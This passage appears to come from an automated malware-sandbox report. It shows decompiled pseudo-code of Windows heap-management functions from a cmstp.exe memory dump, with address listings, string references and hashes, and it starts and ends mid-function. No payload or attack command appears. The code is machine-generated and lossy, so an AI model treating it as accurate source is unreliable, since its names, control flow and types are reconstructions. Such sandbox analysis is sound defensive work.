											 *_t394 =  *_t394 + ( *_t420 & 0x0000ffff);
											 *_t414 =  *_t394;
											 *(_t414 + 4 +  *_t394 * 8) =  *_t394 ^  *(_t307 + 0x54);
											break;
										}
										_t207 = E050FA229(_t307, _t420);
										__eflags = _t207;
										if(_t207 != 0) {
											goto L107;
										}
										E050FA309(_t307, _t420,  *_t420 & 0x0000ffff, 1);
										continue;
									}
									_t342 =  *_t420 & 0x0000ffff;
									while(1) {
										__eflags = _t342 -  *((intOrPtr*)(_t393 + 4));
										if(_t342 <  *((intOrPtr*)(_t393 + 4))) {
											break;
										}
										_t210 =  *_t393;
										__eflags = _t210;
										if(_t210 == 0) {
											_t212 =  *((intOrPtr*)(_t393 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t393 + 4)) - 1;
											L103:
											_t146 =  &(_t420[2]); // -16
											E050FBC04(_t307, _t393, 1, _t146, _t212, _t342);
											goto L104;
										}
										_t393 = _t210;
									}
									_t212 = _t342;
									goto L103;
								} else {
									_t384 = _t414[6];
									_t102 =  &(_t414[4]); // -16
									_t311 = _t102;
									_t215 =  *_t311;
									_v20 = _t215;
									_v16 = _t384;
									_t216 =  *((intOrPtr*)(_t215 + 4));
									__eflags =  *_t384 - _t216;
									if( *_t384 != _t216) {
										L92:
										_push(_t311);
										_push( *_t384);
										E0519A80D(_t307, 0xd, _t311, _t216);
										L93:
										_v5 = 0;
										goto L94;
									}
									__eflags =  *_t384 - _t311;
									if( *_t384 != _t311) {
										goto L92;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
									_t386 =  *(_t307 + 0xb4);
									__eflags = _t386;
									if(_t386 == 0) {
										L79:
										_t313 = _v16;
										_t219 = _v20;
										 *_t313 = _t219;
										 *(_t219 + 4) = _t313;
										__eflags = _t414[1] & 0x00000008;
										if((_t414[1] & 0x00000008) == 0) {
											L82:
											_t314 = _t414[1];
											__eflags = _t314 & 0x00000004;
											if((_t314 & 0x00000004) != 0) {
												_t221 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t221;
												__eflags = _t314 & 0x00000002;
												if((_t314 & 0x00000002) != 0) {
													__eflags = _t221 - 4;
													if(_t221 > 4) {
														_t221 = _t221 - 4;
														__eflags = _t221;
														_v12 = _t221;
													}
												}
												_t127 =  &(_t414[8]); // -8
												_t222 = E0512D540(_t127, _t221, 0xfeeefeee);
												_v20 = _t222;
												__eflags = _t222 - _v12;
												if(_t222 != _v12) {
													_t316 =  *[fs:0x30];
													__eflags =  *(_t316 + 0xc);
													if( *(_t316 + 0xc) == 0) {
														_push("HEAP: ");
														E050DB150();
													} else {
														E050DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t414);
													E050DB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
													_t228 =  *[fs:0x30];
													_t421 = _t421 + 0xc;
													__eflags =  *((char*)(_t228 + 2));
													if( *((char*)(_t228 + 2)) != 0) {
														 *0x51c6378 = 1;
														asm("int3");
														 *0x51c6378 = 0;
													}
												}
											}
											goto L93;
										}
										_t232 = E050FA229(_t307, _t414);
										__eflags = _t232;
										if(_t232 != 0) {
											goto L82;
										}
										E050FA309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
										goto L93;
									}
									_t323 =  *_t414 & 0x0000ffff;
									while(1) {
										__eflags = _t323 -  *((intOrPtr*)(_t386 + 4));
										if(_t323 <  *((intOrPtr*)(_t386 + 4))) {
											break;
										}
										_t235 =  *_t386;
										__eflags = _t235;
										if(_t235 == 0) {
											_t237 =  *((intOrPtr*)(_t386 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t386 + 4)) - 1;
											L78:
											_t111 =  &(_t414[4]); // -16
											E050FBC04(_t307, _t386, 1, _t111, _t237, _t323);
											goto L79;
										}
										_t386 = _t235;
									}
									_t237 = _t323;
									goto L78;
								}
							}
							return _t414;
						}
						_t398 =  *(_t307 + 0x50) ^  *_t420;
						_t347 = _t398 >> 0x00000010 ^ _t398 >> 0x00000008 ^ _t398;
						if(_t398 >> 0x18 != _t347) {
							_push(_t347);
							_push(0);
							_push(0);
							_push(_t420);
							_push(3);
							goto L64;
						}
						goto L6;
					} else {
						_t277 =  *_t419 & 0x0000ffff;
						_v16 = _t277;
						while(1) {
							__eflags = _t277 -  *((intOrPtr*)(_t404 + 4));
							if(_t277 <  *((intOrPtr*)(_t404 + 4))) {
								break;
							}
							_t279 =  *_t404;
							__eflags = _t279;
							if(_t279 == 0) {
								_t277 =  *((intOrPtr*)(_t404 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t404 + 4)) - 1;
								break;
							} else {
								_t404 = _t279;
								_t277 =  *_t419 & 0x0000ffff;
								continue;
							}
						}
						E050FBC04(_t307, _t404, 1, _t350, _t277, _v16);
						goto L20;
					}
				}
			}

0x050f99ca
0x050f99cc
0x050f99df
0x050f99e3
0x050f99f8
0x050f99fb
0x050f99fb
0x00000000
0x050f9a48
0x050f9a48
0x050f9a4c
0x050f9a51
0x050f9a55
0x050f9a61
0x050f9a66
0x050f9a68
0x05141457
0x0514145c
0x0514145c
0x050f9a68
0x050f9a6e
0x050f9a71
0x050f9a74
0x050f9a76
0x05141466
0x05141469
0x05141469
0x0514146c
0x0514146e
0x05141471
0x05141474
0x05141477
0x05141479
0x0514159c
0x0514159c
0x0514159d
0x051415a6
0x051415ab
0x051415ab
0x00000000
0x051415ab
0x0514147f
0x05141481
0x00000000
0x00000000
0x0514148a
0x0514148d
0x05141493
0x05141495
0x051414c0
0x051414c0
0x051414c3
0x051414c6
0x051414c8
0x051414cb
0x051414cf
0x051414f2
0x051414f2
0x051414f5
0x051414f8
0x05141501
0x05141508
0x0514150b
0x0514150e
0x05141510
0x05141513
0x05141515
0x05141515
0x05141518
0x05141518
0x05141513
0x05141521
0x05141525
0x0514152a
0x0514152d
0x05141530
0x05141532
0x05141539
0x0514153d
0x0514155d
0x05141562
0x0514153f
0x05141555
0x0514155a
0x05141570
0x05141577
0x0514157c
0x05141582
0x05141585
0x05141589
0x0514158b
0x05141592
0x05141593
0x05141593
0x05141589
0x05141530
0x00000000
0x051414f8
0x051414d5
0x051414da
0x051414dc
0x00000000
0x051414de
0x051414e8
0x00000000
0x051414e8
0x05141497
0x05141497
0x051414a4
0x051414a4
0x051414a7
0x051414a9
0x051414ab
0x051414ab
0x0514149c
0x0514149e
0x051414a0
0x051414b0
0x051414b0
0x00000000
0x051414a2
0x051414a2
0x00000000
0x051414a2
0x051414a0
0x051414b3
0x051414bb
0x00000000
0x051414bb
0x05141495
0x050f9a7c
0x050f9a7c
0x050f9a7f
0x050f9a7f
0x050f9a82
0x050f9a84
0x050f9a87
0x050f9a8a
0x050f9a8d
0x050f9a8f
0x0514166a
0x0514166a
0x0514166b
0x05141674
0x00000000
0x05141674
0x050f9a95
0x050f9a97
0x00000000
0x00000000
0x050f9aa0
0x050f9aa3
0x050f9aa9
0x050f9aab
0x050f9ad7
0x050f9ad7
0x050f9ada
0x050f9add
0x050f9adf
0x050f9ae2
0x050f9ae6
0x050f9b22
0x050f9b27
0x050f9b29
0x00000000
0x050f9b2b
0x051415be
0x00000000
0x051415be
0x050f9b29
0x050f9ae8
0x050f9ae8
0x050f9aeb
0x050f9aee
0x051415cb
0x051415d2
0x051415d5
0x051415d7
0x051415da
0x051415dc
0x051415dc
0x051415dc
0x051415da
0x051415e5
0x051415e9
0x051415ee
0x051415f1
0x051415f3
0x051415f9
0x05141600
0x05141604
0x05141624
0x05141629
0x05141606
0x0514161c
0x05141621
0x05141637
0x0514163e
0x05141643
0x05141649
0x0514164c
0x05141650
0x05141656
0x0514165d
0x0514165e
0x0514165e
0x05141650
0x051415f3
0x050f9af4
0x050f9af7
0x050f9afc
0x050f9b00
0x050f9b04
0x050f9b08
0x050f9b14
0x050f99fe
0x050f9a04
0x050f9a07
0x00000000
0x050f9a29
0x0514169c
0x051416a0
0x051416a5
0x051416a9
0x051416b5
0x051416ba
0x051416bc
0x051416be
0x051416c3
0x051416c3
0x051416bc
0x051416c8
0x051416cc
0x0514181b
0x0514181b
0x0514181e
0x0514181e
0x05141821
0x05141823
0x05141826
0x05141829
0x0514182c
0x0514182e
0x05141688
0x05141688
0x05141689
0x0514168b
0x0514168c
0x0514168d
0x0514168f
0x05141692
0x00000000
0x05141692
0x05141834
0x05141836
0x00000000
0x00000000
0x0514183f
0x05141842
0x05141848
0x0514184a
0x05141875
0x05141875
0x05141878
0x0514187b
0x0514187d
0x05141880
0x05141884
0x051418a7
0x051418a7
0x051418aa
0x051418ad
0x051418b6
0x051418bd
0x051418c0
0x051418c3
0x051418c5
0x051418c8
0x051418ca
0x051418ca
0x051418cd
0x051418cd
0x051418c8
0x051418d5
0x051418da
0x051418df
0x051418e2
0x051418e5
0x051418e7
0x051418ee
0x051418f2
0x05141912
0x05141917
0x051418f4
0x0514190a
0x0514190f
0x05141925
0x0514192c
0x05141931
0x0514193a
0x0514193e
0x05141940
0x05141947
0x05141948
0x05141948
0x0514193e
0x051418e5
0x0514194f
0x05141952
0x05141956
0x0514195d
0x05141961
0x0514196d
0x00000000
0x0514196d
0x0514188a
0x0514188f
0x05141891
0x00000000
0x00000000
0x0514189d
0x00000000
0x0514189d
0x0514184c
0x05141859
0x05141859
0x0514185c
0x00000000
0x00000000
0x05141851
0x05141853
0x05141855
0x05141865
0x05141865
0x05141866
0x05141868
0x05141870
0x00000000
0x05141870
0x05141857
0x05141857
0x0514185e
0x00000000
0x051416d2
0x051416d2
0x051416d5
0x051416d5
0x051416d8
0x051416da
0x051416dd
0x051416e0
0x051416e3
0x051416e5
0x05141808
0x05141808
0x05141809
0x05141812
0x05141817
0x05141817
0x00000000
0x05141817
0x051416eb
0x051416ed
0x00000000
0x00000000
0x051416f6
0x051416f9
0x051416ff
0x05141701
0x0514172c
0x0514172c
0x0514172f
0x05141732
0x05141734
0x05141737
0x0514173b
0x0514175e
0x0514175e
0x05141761
0x05141764
0x0514176d
0x05141774
0x05141777
0x0514177a
0x0514177c
0x0514177f
0x05141781
0x05141781
0x05141784
0x05141784
0x0514177f
0x0514178c
0x05141791
0x05141796
0x05141799
0x0514179c
0x0514179e
0x051417a5
0x051417a9
0x051417c9
0x051417ce
0x051417ab
0x051417c1
0x051417c6
0x051417dc
0x051417e3
0x051417e8
0x051417ee
0x051417f1
0x051417f5
0x051417f7
0x051417fe
0x051417ff
0x051417ff
0x051417f5
0x0514179c
0x00000000
0x05141764
0x05141741
0x05141746
0x05141748
0x00000000
0x00000000
0x05141754
0x00000000
0x05141754
0x05141703
0x05141710
0x05141710
0x05141713
0x00000000
0x00000000
0x05141708
0x0514170a
0x0514170c
0x0514171c
0x0514171c
0x0514171d
0x0514171f
0x05141727
0x00000000
0x05141727
0x0514170e
0x0514170e
0x05141715
0x00000000
0x05141715
0x051416cc
0x050f9a45
0x050f9a45
0x050f9a0e
0x050f9a1c
0x050f9a23
0x0514167e
0x0514167f
0x05141681
0x05141683
0x05141684
0x00000000
0x05141684
0x00000000
0x050f9aad
0x050f9aad
0x050f9ab0
0x050f9ab3
0x050f9ab3
0x050f9ab6
0x00000000
0x00000000
0x050f9ab8
0x050f9aba
0x050f9abc
0x050f9ac8
0x050f9ac8
0x00000000
0x050f9abe
0x050f9abe
0x050f9ac0
0x00000000
0x050f9ac0
0x050f9abc
0x050f9ad2
0x00000000
0x050f9ad2
0x050f9aab

Strings

HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 05141572, 05141639, 051417DE, 05141927
HEAP[%wZ]: , xrefs: 05141550, 05141617, 051417BC, 05141905
HEAP: , xrefs: 0514155D, 05141624, 051417C9, 05141912

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: f0c46765dfe3825da6293f895a2f984031989f8e7ec00bea2fcd482a42f88dfa
Instruction ID: 0ad916cfa73d34df1385f5400eb41a22c6360ef7d2e25e230250ed58ea6e4d3b
Opcode Fuzzy Hash: f0c46765dfe3825da6293f895a2f984031989f8e7ec00bea2fcd482a42f88dfa
Instruction Fuzzy Hash: 5722D170740242AFEB28DF28D484BBABBF6FF45704F288569E8468B641E775D881CF50

Uniqueness

Uniqueness Score: -1.00%

Function 050FB477 Relevance: 4.2, Strings: 3, Instructions: 405
COMMONCrypto

Download Yara Rule

C-Code - Quality: 67%

			E050FB477(signed int __ecx, signed int* __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int* _v20;
				signed int _v24;
				char _v28;
				signed int _v44;
				char _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t131;
				signed char _t134;
				signed int _t139;
				void* _t141;
				signed int* _t143;
				signed int* _t144;
				intOrPtr* _t147;
				char _t160;
				signed int* _t163;
				signed char* _t164;
				intOrPtr _t165;
				signed int* _t167;
				signed char* _t168;
				intOrPtr _t193;
				intOrPtr* _t195;
				signed int _t203;
				signed int _t209;
				signed int _t211;
				intOrPtr _t214;
				intOrPtr* _t231;
				intOrPtr* _t236;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t240;
				intOrPtr _t241;
				char _t243;
				signed int _t252;
				signed int _t254;
				signed char _t259;
				signed int _t264;
				signed int _t268;
				intOrPtr _t277;
				unsigned int _t279;
				signed int* _t283;
				intOrPtr* _t284;
				unsigned int _t287;
				signed int _t291;
				signed int _t293;

				_v8 =  *0x51cd360 ^ _t293;
				_t223 = __edx;
				_v20 = __edx;
				_t291 = __ecx;
				_t276 =  *__edx;
				_t231 = E050FB8E4( *__edx);
				_t292 = __ecx + 0x8c;
				_v16 = _t231;
				if(_t231 == __ecx + 0x8c) {
					L38:
					_t131 = 0;
					L34:
					return E0511B640(_t131, _t223, _v8 ^ _t293, _t276, _t291, _t292);
				}
				if( *0x51c8748 >= 1) {
					__eflags =  *((intOrPtr*)(_t231 + 0x14)) -  *__edx;
					if(__eflags < 0) {
						_t214 =  *[fs:0x30];
						__eflags =  *(_t214 + 0xc);
						if( *(_t214 + 0xc) == 0) {
							_push("HEAP: ");
							E050DB150();
						} else {
							E050DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(UCRBlock->Size >= *Size)");
						E050DB150();
						__eflags =  *0x51c7bc8;
						if(__eflags == 0) {
							__eflags = 1;
							E05192073(_t223, 1, _t291, 1);
						}
						_t231 = _v16;
					}
				}
				_t5 = _t231 - 8; // -8
				_t292 = _t5;
				_t134 =  *((intOrPtr*)(_t292 + 6));
				if(_t134 != 0) {
					_t223 = (_t292 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
				} else {
					_t223 = _t291;
				}
				_t276 = _v20;
				_v28 =  *((intOrPtr*)(_t231 + 0x10));
				_t139 =  *(_t291 + 0xcc) ^  *0x51c8a68;
				_v12 = _t139;
				if(_t139 != 0) {
					 *0x51cb1e0(_t291,  &_v28, _t276);
					_t141 = _v12();
					goto L8;
				} else {
					_t203 =  *((intOrPtr*)(_t231 + 0x14));
					_v12 = _t203;
					if(_t203 -  *_t276 <=  *(_t291 + 0x6c) << 3) {
						_t264 = _v12;
						__eflags = _t264 -  *(_t291 + 0x5c) << 3;
						if(__eflags < 0) {
							 *_t276 = _t264;
						}
					}
					_t209 =  *(_t291 + 0x40) & 0x00040000;
					asm("sbb ecx, ecx");
					_t268 = ( ~_t209 & 0x0000003c) + 4;
					_v12 = _t268;
					if(_t209 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v48);
						_push(3);
						_push(_t291);
						_push(0xffffffff);
						_t211 = E05119730();
						__eflags = _t211;
						if(_t211 < 0) {
							L56:
							_push(_t268);
							_t276 = _t291;
							E0519A80D(_t291, 1, _v44, 0);
							_t268 = 4;
							goto L7;
						}
						__eflags = _v44 & 0x00000060;
						if((_v44 & 0x00000060) == 0) {
							goto L56;
						}
						__eflags = _v48 - _t291;
						if(__eflags != 0) {
							goto L56;
						}
						_t268 = _v12;
					}
					L7:
					_push(_t268);
					_push(0x1000);
					_push(_v20);
					_push(0);
					_push( &_v28);
					_push(0xffffffff);
					_t141 = E05119660();
					 *((intOrPtr*)(_t291 + 0x20c)) =  *((intOrPtr*)(_t291 + 0x20c)) + 1;
					L8:
					if(_t141 < 0) {
						 *((intOrPtr*)(_t291 + 0x214)) =  *((intOrPtr*)(_t291 + 0x214)) + 1;
						goto L38;
					}
					_t143 =  *( *[fs:0x30] + 0x50);
					if(_t143 != 0) {
						__eflags =  *_t143;
						if(__eflags == 0) {
							goto L10;
						}
						_t144 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
						L11:
						if( *_t144 != 0) {
							__eflags =  *( *[fs:0x30] + 0x240) & 0x00000001;
							if(__eflags != 0) {
								E0519138A(_t223, _t291, _v28,  *_v20, 2);
							}
						}
						if( *((intOrPtr*)(_t291 + 0x4c)) != 0) {
							_t287 =  *(_t291 + 0x50) ^  *_t292;
							 *_t292 = _t287;
							_t259 = _t287 >> 0x00000010 ^ _t287 >> 0x00000008 ^ _t287;
							if(_t287 >> 0x18 != _t259) {
								_push(_t259);
								E0518FA2B(_t223, _t291, _t292, _t291, _t292, __eflags);
							}
						}
						_t147 = _v16 + 8;
						 *((char*)(_t292 + 2)) = 0;
						 *((char*)(_t292 + 7)) = 0;
						_t236 =  *((intOrPtr*)(_t147 + 4));
						_t277 =  *_t147;
						_v24 = _t236;
						_t237 =  *_t236;
						_v12 = _t237;
						_t238 = _v16;
						if(_t237 !=  *((intOrPtr*)(_t277 + 4)) || _v12 != _t147) {
							_push(_t238);
							_push(_v12);
							E0519A80D(0, 0xd, _t147,  *((intOrPtr*)(_t277 + 4)));
							_t238 = _v16;
						} else {
							_t195 = _v24;
							 *_t195 = _t277;
							 *((intOrPtr*)(_t277 + 4)) = _t195;
						}
						if( *(_t238 + 0x14) == 0) {
							L22:
							_t223[0x30] = _t223[0x30] - 1;
							_t223[0x2c] = _t223[0x2c] - ( *(_t238 + 0x14) >> 0xc);
							 *((intOrPtr*)(_t291 + 0x1e8)) =  *((intOrPtr*)(_t291 + 0x1e8)) +  *(_t238 + 0x14);
							 *((intOrPtr*)(_t291 + 0x1fc)) =  *((intOrPtr*)(_t291 + 0x1fc)) + 1;
							 *((intOrPtr*)(_t291 + 0x1f8)) =  *((intOrPtr*)(_t291 + 0x1f8)) - 1;
							_t279 =  *(_t238 + 0x14);
							if(_t279 >= 0x7f000) {
								 *((intOrPtr*)(_t291 + 0x1ec)) =  *((intOrPtr*)(_t291 + 0x1ec)) - _t279;
								_t279 =  *(_t238 + 0x14);
							}
							_t152 = _v20;
							_t240 =  *_v20;
							_v12 = _t240;
							_t241 = _v16;
							if(_t279 <= _t240) {
								__eflags =  *((intOrPtr*)(_t241 + 0x10)) + _t279 - _t223[0x28];
								if( *((intOrPtr*)(_t241 + 0x10)) + _t279 != _t223[0x28]) {
									 *_v20 = _v12 + ( *_t292 & 0x0000ffff) * 8;
									L26:
									_t243 = 0;
									 *((char*)(_t292 + 3)) = 0;
									_t276 = _t223[0x18];
									if(_t223[0x18] != _t223) {
										_t160 = (_t292 - _t223 >> 0x10) + 1;
										_v24 = _t160;
										__eflags = _t160 - 0xfe;
										if(_t160 >= 0xfe) {
											_push(0);
											_push(0);
											E0519A80D(_t276, 3, _t292, _t223);
											_t160 = _v24;
										}
										_t243 = _t160;
									}
									 *((char*)(_t292 + 6)) = _t243;
									_t163 =  *( *[fs:0x30] + 0x50);
									if(_t163 != 0) {
										__eflags =  *_t163;
										if( *_t163 == 0) {
											goto L28;
										}
										_t227 = 0x7ffe0380;
										_t164 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
										goto L29;
									} else {
										L28:
										_t227 = 0x7ffe0380;
										_t164 = 0x7ffe0380;
										L29:
										if( *_t164 != 0) {
											_t165 =  *[fs:0x30];
											__eflags =  *(_t165 + 0x240) & 0x00000001;
											if(( *(_t165 + 0x240) & 0x00000001) != 0) {
												__eflags = E050F7D50();
												if(__eflags != 0) {
													_t227 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
													__eflags =  &(( *( *[fs:0x30] + 0x50))[0x89]);
												}
												_t276 = _t292;
												E05191582(_t227, _t291, _t292, __eflags,  *_v20,  *(_t291 + 0x74) << 3,  *_t227 & 0x000000ff);
											}
										}
										_t223 = 0x7ffe038a;
										_t167 =  *( *[fs:0x30] + 0x50);
										if(_t167 != 0) {
											__eflags =  *_t167;
											if( *_t167 == 0) {
												goto L31;
											}
											_t168 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
											goto L32;
										} else {
											L31:
											_t168 = _t223;
											L32:
											if( *_t168 != 0) {
												__eflags = E050F7D50();
												if(__eflags != 0) {
													_t223 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
													__eflags =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
												}
												_t276 = _t292;
												E05191582(_t223, _t291, _t292, __eflags,  *_v20,  *(_t291 + 0x74) << 3,  *_t223 & 0x000000ff);
											}
											_t131 = _t292;
											goto L34;
										}
									}
								}
								_t152 = _v20;
							}
							E050FB73D(_t291, _t223,  *((intOrPtr*)(_t241 + 0x10)) + _v12 + 0xffffffe8, _t279 - _v12, _t292, _t152);
							 *_v20 =  *_v20 << 3;
							goto L26;
						} else {
							_t283 =  *(_t291 + 0xb8);
							if(_t283 != 0) {
								_t190 =  *(_t238 + 0x14) >> 0xc;
								while(1) {
									__eflags = _t190 - _t283[1];
									if(_t190 < _t283[1]) {
										break;
									}
									_t252 =  *_t283;
									__eflags = _t252;
									_v24 = _t252;
									_t238 = _v16;
									if(_t252 == 0) {
										_t190 = _t283[1] - 1;
										__eflags = _t283[1] - 1;
										L70:
										E050FBC04(_t291, _t283, 0, _t238, _t190,  *(_t238 + 0x14));
										_t238 = _v16;
										goto L19;
									}
									_t283 = _v24;
								}
								goto L70;
							}
							L19:
							_t193 =  *_t238;
							_t284 =  *((intOrPtr*)(_t238 + 4));
							_t254 =  *((intOrPtr*)(_t193 + 4));
							_v24 = _t254;
							_t238 = _v16;
							if( *_t284 != _t254 ||  *_t284 != _t238) {
								_push(_t238);
								_push( *_t284);
								E0519A80D(0, 0xd, _t238, _v24);
								_t238 = _v16;
							} else {
								 *_t284 = _t193;
								 *((intOrPtr*)(_t193 + 4)) = _t284;
							}
							goto L22;
						}
					}
					L10:
					_t144 = 0x7ffe0380;
					goto L11;
				}
			}

0x050fb486
0x050fb48a
0x050fb48e
0x050fb491
0x050fb493
0x050fb49a
0x050fb49c
0x050fb4a2
0x050fb4a7
0x050fb6fc
0x050fb6fc
0x050fb6b3
0x050fb6c3
0x050fb6c3
0x050fb4b4
0x0514294f
0x05142951
0x05142957
0x0514295d
0x05142961
0x05142980
0x05142985
0x05142963
0x05142978
0x0514297d
0x0514298b
0x05142990
0x05142995
0x0514299d
0x051429a1
0x051429a2
0x051429a2
0x051429a7
0x051429a7
0x05142951
0x050fb4ba
0x050fb4ba
0x050fb4bd
0x050fb4c2
0x050fb6d4
0x050fb4c8
0x050fb4c8
0x050fb4c8
0x050fb4cd
0x050fb4d0
0x050fb4d9
0x050fb4df
0x050fb4e2
0x051429b7
0x051429bd
0x00000000
0x050fb4e8
0x050fb4e8
0x050fb4ef
0x050fb4fa
0x050fb703
0x050fb709
0x050fb70b
0x050fb711
0x050fb711
0x050fb70b
0x050fb503
0x050fb50c
0x050fb511
0x050fb514
0x050fb519
0x051429c5
0x051429c7
0x051429cc
0x051429cd
0x051429cf
0x051429d0
0x051429d2
0x051429d7
0x051429d9
0x051429ee
0x051429ee
0x051429f4
0x051429fa
0x05142a01
0x00000000
0x05142a01
0x051429db
0x051429df
0x00000000
0x00000000
0x051429e1
0x051429e4
0x00000000
0x00000000
0x051429e6
0x051429e6
0x050fb51f
0x050fb51f
0x050fb520
0x050fb525
0x050fb52b
0x050fb52d
0x050fb52e
0x050fb530
0x050fb535
0x050fb53b
0x050fb53d
0x05142a07
0x00000000
0x05142a07
0x050fb549
0x050fb54e
0x05142a12
0x05142a15
0x00000000
0x00000000
0x05142a24
0x050fb559
0x050fb55c
0x05142a34
0x05142a3b
0x05142a4d
0x05142a4d
0x05142a3b
0x050fb566
0x050fb56b
0x050fb56f
0x050fb57b
0x050fb582
0x05142a57
0x05142a5c
0x05142a5c
0x050fb582
0x050fb58b
0x050fb58e
0x050fb592
0x050fb596
0x050fb599
0x050fb59b
0x050fb59e
0x050fb5a3
0x050fb5a6
0x050fb5a9
0x05142a66
0x05142a67
0x05142a73
0x05142a78
0x050fb5b8
0x050fb5b8
0x050fb5bb
0x050fb5bd
0x050fb5bd
0x050fb5c4
0x050fb5f7
0x050fb5f7
0x050fb600
0x050fb606
0x050fb60c
0x050fb612
0x050fb618
0x050fb621
0x050fb623
0x050fb629
0x050fb629
0x050fb62c
0x050fb62f
0x050fb633
0x050fb636
0x050fb639
0x050fb71d
0x050fb720
0x050fb736
0x050fb660
0x050fb660
0x050fb662
0x050fb665
0x050fb66a
0x050fb6e6
0x050fb6e7
0x050fb6ea
0x050fb6ef
0x05142ad1
0x05142ad2
0x05142ad8
0x05142add
0x05142add
0x050fb6f5
0x050fb6f5
0x050fb672
0x050fb675
0x050fb67a
0x05142ae5
0x05142ae8
0x00000000
0x00000000
0x05142af4
0x05142afc
0x00000000
0x050fb680
0x050fb680
0x050fb680
0x050fb685
0x050fb687
0x050fb68a
0x05142b06
0x05142b0c
0x05142b13
0x05142b1e
0x05142b20
0x05142b2b
0x05142b2b
0x05142b2b
0x05142b34
0x05142b45
0x05142b45
0x05142b13
0x050fb696
0x050fb69b
0x050fb6a0
0x05142b4f
0x05142b52
0x00000000
0x00000000
0x05142b61
0x00000000
0x050fb6a6
0x050fb6a6
0x050fb6a6
0x050fb6a8
0x050fb6ab
0x05142b70
0x05142b72
0x05142b7d
0x05142b7d
0x05142b7d
0x05142b86
0x05142b97
0x05142b97
0x050fb6b1
0x00000000
0x050fb6b1
0x050fb6a0
0x050fb67a
0x050fb722
0x050fb722
0x050fb655
0x050fb65d
0x00000000
0x050fb5c6
0x050fb5c6
0x050fb5ce
0x05142a83
0x05142a97
0x05142a97
0x05142a9a
0x00000000
0x00000000
0x05142a88
0x05142a8a
0x05142a8c
0x05142a8f
0x05142a92
0x05142aa1
0x05142aa1
0x05142aa2
0x05142aab
0x05142ab0
0x00000000
0x05142ab0
0x05142a94
0x05142a94
0x00000000
0x05142a9c
0x050fb5d4
0x050fb5d4
0x050fb5d6
0x050fb5d9
0x050fb5de
0x050fb5e1
0x050fb5e4
0x05142ab8
0x05142ab9
0x05142ac4
0x05142ac9
0x050fb5f2
0x050fb5f2
0x050fb5f4
0x050fb5f4
0x00000000
0x050fb5e4
0x050fb5c4
0x050fb554
0x050fb554
0x00000000
0x050fb554

Strings

(UCRBlock->Size >= *Size), xrefs: 0514298B
HEAP[%wZ]: , xrefs: 05142973
HEAP: , xrefs: 05142980

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: 4410caf927e6176bceedd32c643826c596c65c6750e642f7256be2589847bd5e
Instruction ID: d7e0560d0d2c84e8ca971c911875f263948a5877a10c0ff26254e9b547d26a40
Opcode Fuzzy Hash: 4410caf927e6176bceedd32c643826c596c65c6750e642f7256be2589847bd5e
Instruction Fuzzy Hash: 29E19A74700205AFDB19CF68D894BBEBBB6FF44704F2481A9E5129B691D734E981CF90

Uniqueness

Uniqueness Score: -1.00%

Function 050E8794 Relevance: 4.0, Strings: 3, Instructions: 255
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E050E8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
